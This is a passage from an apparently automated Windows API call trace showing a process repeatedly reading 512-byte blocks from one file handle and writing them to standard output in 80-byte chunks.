hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType 
(hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.008] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.009] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.009] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, 
lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.010] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.010] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0141.010] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.011] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.011] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.013] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.013] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, 
lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 
| out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.014] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.014] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.015] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.015] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 
[0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.017] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] GetFileType (hFile=0x4c) returned 0x1 [0141.017] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.017] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] GetFileType (hFile=0x4c) returned 0x1 [0141.017] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.018] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.018] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, 
lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType 